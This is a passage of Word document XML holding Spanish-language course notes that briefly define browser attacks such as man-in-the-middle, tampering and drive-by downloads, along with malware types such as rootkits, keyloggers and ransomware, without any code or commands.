      <w:r>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="62306BAB" w14:textId="6F133598" w:rsidR="00DE53EC" w:rsidRPr="00DE53EC" w:rsidRDefault="00DE53EC" w:rsidP="00DE53EC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EFBE80D" wp14:editId="10B562F6">
            <wp:extent cx="2119505" cy="1981610"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1696742192" name="Imagen 1"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42192" name="Imagen 1" descr="Imagen que contiene computadora&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2139162" cy="1999988"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="403B72E3" w14:textId="5613E079" w:rsidR="004C318E" w:rsidRDefault="004C318E" w:rsidP="004C318E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43B35737" w14:textId="56CEA0A4" w:rsidR="004C318E" w:rsidRPr="00826953" w:rsidRDefault="00826953" w:rsidP="00826953">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00826953">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">Man In The Middle: </w:t>
      </w:r>
      <w:r w:rsidRPr="00826953">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">Mismo concepto que el </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00826953">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>sniffer</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00826953">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> pero además</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> puede modificar. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACD6A0F" w14:textId="77777777" w:rsidR="00EC3730" w:rsidRPr="00826953" w:rsidRDefault="00EC3730" w:rsidP="004C318E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="642216EA" w14:textId="77777777" w:rsidR="00526003" w:rsidRPr="00EC3730" w:rsidRDefault="004C318E" w:rsidP="004C318E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC3730">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">Atacando a los </w:t>
      </w:r>
      <w:r w:rsidR="00526003" w:rsidRPr="00EC3730">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC3730">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>avegadores</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE96C52" w14:textId="6DE5D656" w:rsidR="00526003" w:rsidRPr="00526003" w:rsidRDefault="004C318E" w:rsidP="004C318E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Tampering o Data Diddling</w:t>
      </w:r>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Modificaciones no autorizadas de información</w:t>
      </w:r>
      <w:r w:rsidR="005004D4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que se realizan desde el lado del cliente. Se realiza por medio de proxys. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519A86C0" w14:textId="79D54FC4" w:rsidR="00526003" w:rsidRPr="00526003" w:rsidRDefault="004C318E" w:rsidP="004C318E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ataques Mediante JavaScript:</w:t>
      </w:r>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005004D4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Capacidad de poder operar en el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005004D4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>runtime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005004D4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> del cliente. </w:t>
      </w:r>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Se explotan fallas de seguridad de navegadores web y servidores de correo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF12F98" w14:textId="19513D3F" w:rsidR="004C318E" w:rsidRPr="005004D4" w:rsidRDefault="004C318E" w:rsidP="004C318E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Ataques </w:t>
      </w:r>
      <w:r w:rsidR="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ri</w:t>
      </w:r>
      <w:r w:rsidR="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>e-</w:t>
      </w:r>
      <w:r w:rsidR="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">y </w:t>
      </w:r>
      <w:r w:rsidR="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ownload:</w:t>
      </w:r>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Infecciones masivas, solo ingresando a un sitio web. Propagan los </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>malware</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> e inyectan código dañino entre su código original. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242DDEE9" w14:textId="77777777" w:rsidR="00526003" w:rsidRDefault="004C318E" w:rsidP="00526003">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Otras tecnologías generadoras de riesgos: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C3730" w14:paraId="4344D7E4" w14:textId="77777777" w:rsidTr="00EC3730">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4414" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33775D17" w14:textId="1E977286" w:rsidR="00EC3730" w:rsidRPr="00EC3730" w:rsidRDefault="00EC3730" w:rsidP="00EC3730">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="33"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>JavaScript</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4414" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="053AFE92" w14:textId="179422D3" w:rsidR="00EC3730" w:rsidRPr="00EC3730" w:rsidRDefault="00EC3730" w:rsidP="00EC3730">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="33"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>ActiveX</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC3730" w14:paraId="4899A915" w14:textId="77777777" w:rsidTr="00EC3730">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4414" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="431B3027" w14:textId="2CB0B1F5" w:rsidR="00EC3730" w:rsidRPr="00EC3730" w:rsidRDefault="00EC3730" w:rsidP="00EC3730">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="33"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Shockwave</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4414" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05131858" w14:textId="484BF89E" w:rsidR="00EC3730" w:rsidRPr="00EC3730" w:rsidRDefault="00EC3730" w:rsidP="00EC3730">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="33"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Java Applets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC3730" w14:paraId="11D559BC" w14:textId="77777777" w:rsidTr="00EC3730">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4414" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49F85E8C" w14:textId="067C53BB" w:rsidR="00EC3730" w:rsidRPr="00EC3730" w:rsidRDefault="00EC3730" w:rsidP="00EC3730">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="33"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Microsoft Silverlight</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4414" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58500B7B" w14:textId="7811FA0B" w:rsidR="00EC3730" w:rsidRPr="00EC3730" w:rsidRDefault="00EC3730" w:rsidP="00EC3730">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="33"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>PDF Flash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC3730" w14:paraId="2C1A727E" w14:textId="77777777" w:rsidTr="00EC3730">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4414" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40E031ED" w14:textId="58496B59" w:rsidR="00EC3730" w:rsidRPr="00EC3730" w:rsidRDefault="00EC3730" w:rsidP="00EC3730">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="33"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Plugins de Navegador</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4414" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73E82683" w14:textId="77777777" w:rsidR="00EC3730" w:rsidRDefault="00EC3730" w:rsidP="00526003">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D5E9F04" w14:textId="77777777" w:rsidR="00EC3730" w:rsidRDefault="00EC3730" w:rsidP="004C318E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BC7FF39" w14:textId="2C6C9A0D" w:rsidR="0079276A" w:rsidRDefault="004C318E" w:rsidP="004C318E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Otros </w:t>
      </w:r>
      <w:r w:rsidR="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">taques a </w:t>
      </w:r>
      <w:r w:rsidR="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00526003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>lientes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C625B68" w14:textId="4ED26809" w:rsidR="0079276A" w:rsidRPr="00AE18AA" w:rsidRDefault="004C318E" w:rsidP="004C318E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0079276A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Hijackers:</w:t>
      </w:r>
      <w:r w:rsidR="00B13BE3" w:rsidRPr="0079276A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0079276A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Programas que </w:t>
      </w:r>
      <w:r w:rsidR="00B13BE3" w:rsidRPr="0079276A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>modifica</w:t>
      </w:r>
      <w:r w:rsidR="0079276A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00B13BE3" w:rsidRPr="0079276A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> el funcionamiento o configuración del cliente para que el atacante secuestre información</w:t>
      </w:r>
      <w:r w:rsidR="0079276A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00EC3730">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EC3730" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ejemplo: Page hijacking, Session hijacking, Browser hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0F1D12" w14:textId="26452FAA" w:rsidR="0079276A" w:rsidRPr="0079276A" w:rsidRDefault="00B13BE3" w:rsidP="004C318E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0079276A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Rootkits:</w:t>
      </w:r>
      <w:r w:rsidR="0079276A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0079276A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Programas que permiten que aplicaciones maliciosas permanezcan ocultas en el S</w:t>
      </w:r>
      <w:r w:rsidR="0079276A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0079276A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="0079276A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0079276A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> o que no pueda ser eliminada</w:t>
      </w:r>
      <w:r w:rsidR="0079276A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00EC3730">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EC3730" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ejemplo: procesos fantasmas en paralelo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FF7FE3" w14:textId="4407A9D3" w:rsidR="0079276A" w:rsidRPr="0079276A" w:rsidRDefault="00B13BE3" w:rsidP="004C318E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0079276A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Backdoors:</w:t>
      </w:r>
      <w:r w:rsidRPr="0079276A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Son programas que habilitan un acceso alternativo al sistema, evitando autenticaciones.</w:t>
      </w:r>
      <w:r w:rsidR="00EC3730">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Se suelen instalar en sistemas comprometidos para facilitar su posterior uso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B14FAA7" w14:textId="77777777" w:rsidR="0079276A" w:rsidRPr="0079276A" w:rsidRDefault="00B13BE3" w:rsidP="004C318E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0079276A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Stealers:</w:t>
      </w:r>
      <w:r w:rsidRPr="0079276A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Programas que acceden a </w:t>
      </w:r>
      <w:r w:rsidR="0079276A" w:rsidRPr="0079276A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>info</w:t>
      </w:r>
      <w:r w:rsidR="0079276A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>rmación</w:t>
      </w:r>
      <w:r w:rsidRPr="0079276A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> almacenada. Su principal objetivo son contraseñas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22938010" w14:textId="2C8AF8E8" w:rsidR="0079276A" w:rsidRPr="0079276A" w:rsidRDefault="00B13BE3" w:rsidP="004C318E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0079276A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Keyloggers:</w:t>
      </w:r>
      <w:r w:rsidRPr="0079276A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Registran la actividad de dispositivos de entrada</w:t>
      </w:r>
      <w:r w:rsidR="00986EC5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00986EC5" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ejem</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>plo</w:t>
      </w:r>
      <w:r w:rsidR="00986EC5" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> teclados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CDC47E" w14:textId="0B91ACAB" w:rsidR="00B13BE3" w:rsidRPr="00AE18AA" w:rsidRDefault="00B13BE3" w:rsidP="004C318E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0079276A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Rasomware:</w:t>
      </w:r>
      <w:r w:rsidRPr="0079276A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Retienen el control del equipo o cifran información almacenada</w:t>
      </w:r>
      <w:r w:rsidR="00986EC5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> para que esta no pueda ser accedida</w:t>
      </w:r>
      <w:r w:rsidRPr="0079276A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. En muchos casos cobran rescate de esta </w:t>
      </w:r>
      <w:r w:rsidR="0079276A" w:rsidRPr="0079276A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>info</w:t>
      </w:r>
      <w:r w:rsidR="0079276A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>rmación.</w:t>
      </w:r>
      <w:r w:rsidR="00986EC5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00986EC5" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ejemplos</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: VirusUkash, WannaCry, Petya/NotPetya,</w:t>
      </w:r>
      <w:r w:rsidR="00986EC5" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cryptolocker, Cryptowall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4237D902" w14:textId="77777777" w:rsidR="0079276A" w:rsidRPr="0079276A" w:rsidRDefault="0079276A" w:rsidP="0079276A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
